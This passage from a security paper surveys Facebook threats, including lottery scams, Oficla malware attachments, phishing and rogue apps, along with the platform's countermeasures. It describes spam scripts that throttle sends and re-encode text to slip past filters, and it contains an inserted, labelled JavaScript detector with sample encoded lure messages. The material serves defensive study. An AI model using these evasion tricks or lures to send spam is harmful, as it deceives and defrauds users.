Figure 22: Pharmaceutical store page.

Lottery scams have also been very common, using fake email notifications describing surprise lottery wins such as the ‘Facebook Africa Jackpot Promo’ shown in Figure 23 [16].

Figure 23: Facebook lottery email scam.

Figure 24: Fake Facebook email password notification (1).

Figure 25: Fake Facebook email password notification (2).

Figure 26: Fake Facebook email password notification (3).
The email has all the signs of an advance fee fraud scam, promising a huge sum of money, requesting detailed personal information, and requiring secrecy.

Malware writers have also taken advantage of fake Facebook email notifications. Emails include subjects relating to: ‘Facebook Abuse Department’, ‘Facebook Security’, and others (Figure 24). In the examples shown in Figures 25 and 26, variants of the malware detected as Oficla (aka Bredolab) are sent as attachments with the email describing a password reset due to spam. Subjects include, ‘Spam from your account’. The attachment names include: ‘Attached_SecurityCode.exe’, ‘Facebook_DOCUMENT.EXE’ and ‘Facebook_PASSWORD.EXE’. These are all malware executables that use misleading file icons in addition to their misleading file names. The use of trusted icons is a common social engineering tactic to trick a user into executing the malware file. Below are examples of the Oficla executables with misleading filenames and icons:

Figure 27: Oficla attachment file (1).

Figure 28: Oficla attachment file (2).

Phishing

Genuine Facebook user accounts are very valuable for cybercriminals since they provide them with access to a trusting network of friends. Facebook users have therefore become a natural target for phishers. Many fake pages have been launched (fed from fake email notifications) in order to steal users’ login information. Cybercriminals can then use these stolen accounts for many of the malicious purposes described in this paper. Attackers have become skilled at mimicking the actual Facebook login page, as in the example shown in Figure 29 [17].

Figure 29: Facebook phishing page sample.

According to PhishTank.com statistics [18], Facebook has consistently been in the 10 top sites targeted by phishing. From September 2009 until March 2011, 11,211 counts of phishing attempts were recorded (Figure 30).

Figure 30: Facebook phishing sites statistics.

Fake applications

Many Facebook users enjoy Facebook applications and games that exist within the social network such as FarmVille and CityVille, and attackers have also taken advantage of this functionality. The problem with applications on Facebook is that they have the ability to access some or all of the user’s profile information. Rogue applications can therefore post messages on a friend’s wall, send messages, and even extract information from user profiles to be used for any malicious purpose. Attackers usually use catchy subjects such as: ‘who viewed your profile’. A further issue is that the verification process for application writers is relatively simple.

PREVENTIVE MEASURES

Prevention is always better than cure. The trusted network nature of Facebook has made some cybercrime much easier. On the other hand, Facebook has improved its security measures and settings to protect its users. These measures have included partnerships with security organizations to help improve the site’s security tools. Although these systems are not perfect, they are worth noting as they do contribute to user security.

Spam, scam and clickjack prevention systems

Facebook has implemented security checks in order to protect users from phishing attacks. In the example below it was able to detect an attempt to log in from a page outside Facebook. When a user tries to visit a page that does not belong to Facebook, but requires a login to Facebook, the warning message below appears:

Figure 31: Security notice from a login attempt outside Facebook.
In the example in Figure 32, the mechanisms were also able to detect a suspicious phishing site that used a shortened URL. An example of a warning message is shown.

Figure 32: Facebook suspicious link warning.

In some cases, Facebook security tools are able to check and prevent spammers and scammers from creating fake user accounts. Examples of some of these security checks are shown below:

Figure 33: Account security check (1).

Figure 34: Account security check (2).

Figure 35: Account security check (3).

CAPTCHA verifications are designed to prevent automation of account creation by non-humans. When this CAPTCHA verification pops up, a user can optionally verify an account in order to avoid CAPTCHA verifications in the future. This verification requires a phone number. These checks are helpful, but they open the issue of user privacy and sharing of sensitive information. Security check messages may also pop up in some cases of clicking the ‘Like’ button of certain group pages.

Facebook has automated the detection of suspicious ‘like’ behaviour, which can prevent a clickjacking attack. This is good on some level, however, in cases where the behavioural pattern of a clickjacking attack changes, then chances are that new attacks might slip through [19].

Facebook has also automated detection and blocking of suspicious content including giving warnings why certain content has been blocked. Using information from user reports and common patterns of spam and scam behaviour they have been able to prevent users from opening and accessing malicious content [20]. However, spam writers continually try to evade spam detection systems. For instance, one script included the following code:

Figure 36: JavaScript spam code.

A common indicator of a spammer account is of course the large number of messages sent. In the code above, the variable nfriends is actually the number of friends the spam and scam messages will be sent to. Although it seems strange that messages are sent to only 15 of the victim’s friends (as opposed to all the victim’s friends), this is one way of trying to avoid detection based on the volume of sent messages. In addition, in order to avoid detection based on message content, the encoding of some characters of the words inside the message body has been altered.

Facebook apps

As described above, malicious apps have access to the user’s profile information and can take control of some actions such as posting on walls. As of this writing, an app creator must first verify an account by supplying a phone number or credit card number. The image below shows the verification pop-up window:

Figure 37: Facebook verification on application creation.

This is helpful to a degree. After supplying the information, an application can be created for the Facebook platform. The problem here is that, after the account has been verified, the developer can instantly publish any application without going through some approval from the Facebook team. Therefore, any malware writer can write an application on the platform and publish it without going through any security check.

Facebook security settings

Facebook has enabled secure browsing by implementing HTTPS on its platform. This adds protection and prevents hackers from being able to steal identity information while it is in transit – especially when a user logs in from a public place such as a coffee shop or library. However, this security option is not enabled by default.
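The evasion described under ‘Spam, scam and clickjack prevention systems’ (sending to only 15 friends per account and altering the encoding of characters in the message body) defeats a per-account volume rule but not a rule that groups normalized content across accounts. The following is an added example, not code from the paper or from Facebook: the thresholds, the log format, the account names and the short.example domain are all assumptions, and the paper does not say which encodings were altered, so the ones handled here are illustrative.

```javascript
// Added example: spot a spam campaign when each account stays under a volume
// limit (the page's nfriends = 15) and varies the encoding of the message body.
// Thresholds, field names and the log below are assumptions for this example.
const PER_SENDER_LIMIT = 50; // naive rule: flag an account that sends more than this
const CAMPAIGN_SENDERS = 3;  // content rule: same text from at least this many accounts

const codePoint = n => (n <= 0x10FFFF ? String.fromCodePoint(n) : '');

// Undo common encodings so that variants of one message compare equal.
function normalize(text) {
  return text
    .replace(/&#x([0-9a-f]+);/gi, (m, h) => codePoint(parseInt(h, 16))) // &#x69;
    .replace(/&#(\d+);/g, (m, d) => codePoint(Number(d)))               // &#105;
    .replace(/(?:%[0-9a-f]{2})+/gi, m => {                              // %20
      try { return decodeURIComponent(m); } catch (e) { return m; }
    })
    .normalize('NFKC')                           // fullwidth letters -> ASCII
    .replace(/[\u200B-\u200D\u2060\uFEFF]/g, '') // zero-width characters
    .toLowerCase().replace(/\s+/g, ' ').trim();
}

// Returns accounts over the volume limit and texts shared across many accounts.
function detect(log) {
  const perSender = new Map(); // sender -> messages sent
  const perText = new Map();   // normalized text -> Set of senders
  for (const { sender, text } of log) {
    perSender.set(sender, (perSender.get(sender) || 0) + 1);
    const key = normalize(text);
    if (!perText.has(key)) perText.set(key, new Set());
    perText.get(key).add(sender);
  }
  return {
    volumeFlags: [...perSender].filter(([, n]) => n > PER_SENDER_LIMIT).map(([s]) => s),
    campaigns: [...perText]
      .filter(([, senders]) => senders.size >= CAMPAIGN_SENDERS)
      .map(([text, senders]) => ({ text, senders: [...senders].sort() })),
  };
}

// Constructed log: three accounts each send 15 copies of one lure, every account
// with a different encoding; "short.example" is a placeholder domain.
const LURES = {
  alice: 'See who viewed your profile http://short.example/x1',
  bob: 'See who v&#105;ewed your prof&#x69;le http://short.example/x1',
  carol: '\uFF33\uFF45\uFF45 who viewed%20your pro\u200Bfile http://short.example/x1',
};
const LOG = [{ sender: 'dave', recipient: 'erin', text: 'Lunch tomorrow?' }];
for (const [sender, text] of Object.entries(LURES)) {
  for (let i = 0; i < 15; i++) LOG.push({ sender, recipient: `friend${i}`, text });
}

console.log(detect(LOG));
```

On this log the volume rule flags nobody, while the content rule groups the three encoded variants into a single campaign.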
Figure 38: Facebook HTTPS browsing setting.

Another security tool is the Facebook activity monitor that enables remote logout. A user can see the latest activities in his account by checking the Account Settings which include an indication that the account is active through a different location or device. The screen below shows a single account signed in on different computers. The user may end any active login from a different computer or location that he is not aware of. This is helpful in tracking if someone else is using an account.

Figure 39: Facebook activity monitor.

Facebook security and safety page

Educating users about Internet safety is another important preventive measure – particularly since most of the attacks rely on social engineering. The Facebook security page provides:

• Information such as how to protect a user account, and how to take action when an account has been compromised and used for sending scams or spam.
• Information about the threats that a user may encounter on Facebook and helpful tips to avoid scams, spams, hacks and malware that may be spreading on the platform.
• A way of reporting a possible security vulnerability allowing Facebook to work on improving security measures.
• A safety page that explains Facebook as a community in which everyone has a shared responsibility of keeping it as a safe environment. This gives an insight for parents, teens and teachers who are using Facebook and helps them understand the environment as well.

Security blogs

There continue to be numerous blog posts written about Facebook threats. Commtouch’s security blog and those of other anti-virus companies can enlighten customers about new threats that are found on the social network. Many of these blogs are very illustrative and informative, allowing users to easily understand, and be aware of the types of threats they might encounter on Facebook. These also provide tips on strengthening security and account settings.

DEFENSIVE MEASURES

Facebook generally blocks known malicious content or pages that are reported to it. Facebook reporting tools include links such as ‘Mark as Spam’ and ‘Report/Block this Person’.

Another defence available to end-users is a locally installed security product, such as URL and spam filtering software, and an anti-virus product. Anti-virus firms have also responded to the new threats by ensuring detection of new variants of Facebook worms, Oficla, and the increasing number of malicious scripts used for spamming. At the same time, security groups have created their own Facebook pages for users to view the latest threats including advice about how to remain secure and protected. Several companies have also released software specifically for Facebook.

CONCLUSION

As it has gained in popularity Facebook has also been increasingly used for malicious purposes, and its name, functionalities and features have been vastly exploited. The security industry is continually working to keep pace with new cybercriminal tricks on Facebook. In addition, Facebook has taken several steps to protect its users while working with security groups in order to improve its defence systems and the security tools on the platform.

As shown by the many examples above, attackers employ numerous social engineering tactics to help spread malware, scams and spam. Indeed, the key security problem with Facebook lies in the trusted nature of friend connections which are so easy to exploit with social engineering. Education of users is therefore a key part of enhancing Facebook security.

ACKNOWLEDGEMENTS

I would like to express my sincere gratitude to Commtouch VirusLab and to the hands of the people that God used to make the completion of this paper possible: Robert Sandilands, Rommel Ramos, Avi Turiel, Rebecca Herson, Catherine Lor and Jinky Suarez. And whatsoever ye do, do it heartily, as to the Lord, and not unto men; – Colossians 3:23.

REFERENCES

[1] http://www.socialbakers.com/Facebook-statistics/?interval=last-week#chart-intervals.
[2] http://www.Facebook.com/press/info.php?statistics.
[3] http://www.onlineschools.org/blog/Facebook-obsession/.
[4] http://blog.Facebook.com/blog.php?post=68886667130.
[5] http://www.kaspersky.com/news?id=207575670.
[6] Commtouch Trend Report 2010 Q4. http://www.commtouch.com/download/1934.
[7] http://blog.commtouch.com/cafe/malware/malware-spread-via-Facebook-chat/.
[8] http://nakedsecurity.sophos.com/2011/01/09/Facebook-photo-album-chat-messages-spreading-koobface-worm/.
[9] http://www.f-secure.com/weblog/archives/00001955.html.
[10] http://athansj.blogspot.com/2011/03/Facebook-likejacking-attack.html.
[11] http://nakedsecurity.sophos.com/2011/04/30/Facebook-comment-jacking-omg-i-cant-believe-justin-bieber-did-this-to-a-girl/.
[12] http://blog.commtouch.com/cafe/malware/500-free-credits-from-Facebook-%E2%80%93-malware/#disqus_thread.
[13] http://blog.commtouch.com/cafe/malware/%E2%80%9Cosama-bin-laden-dead-%E2%80%93-actual-video%E2%80%9D-new-Facebook-malware/.
[14] http://www.thenewnewinternet.com/2010/06/01/Facebook-used-to-find-money-mules/.
[15] http://blog.commtouch.com/cafe/spam-favorites/spammers-vote-Facebook-%E2%80%93-%E2%80%9Capplication-of-the-year%E2%80%9D/.
[16] http://blog.commtouch.com/cafe/anti-scam/harry-potters-magic-money-foundation-and-more/.
[17] http://blog.commtouch.com/cafe/phishing/avoiding-Facebook-phishing/.
[18] http://www.phishtank.com/stats.php.
[19] http://nakedsecurity.sophos.com/2011/03/30/Facebook-adds-speed-bump-to-slow-down-likejackers/.
[20] http://blog.Facebook.com/blog.php?post=403200567130 (spam prevention systems).
[21] http://www.securelist.com/en/blog/208187962/Facebook_money_mule_or_credit_card.
[22] http://en.wikipedia.org/wiki/Clickjacking.
[23] http://www.personalizemedia.com/the-count/.
[24] http://www.Facebook.com/security.
[25] http://www.Facebook.com/blog.php?post=486790652130.
[26] http://blog.Facebook.com/blog.php?post=436800707130.
[27] http://blog.Facebook.com/blog.php?post=389991097130.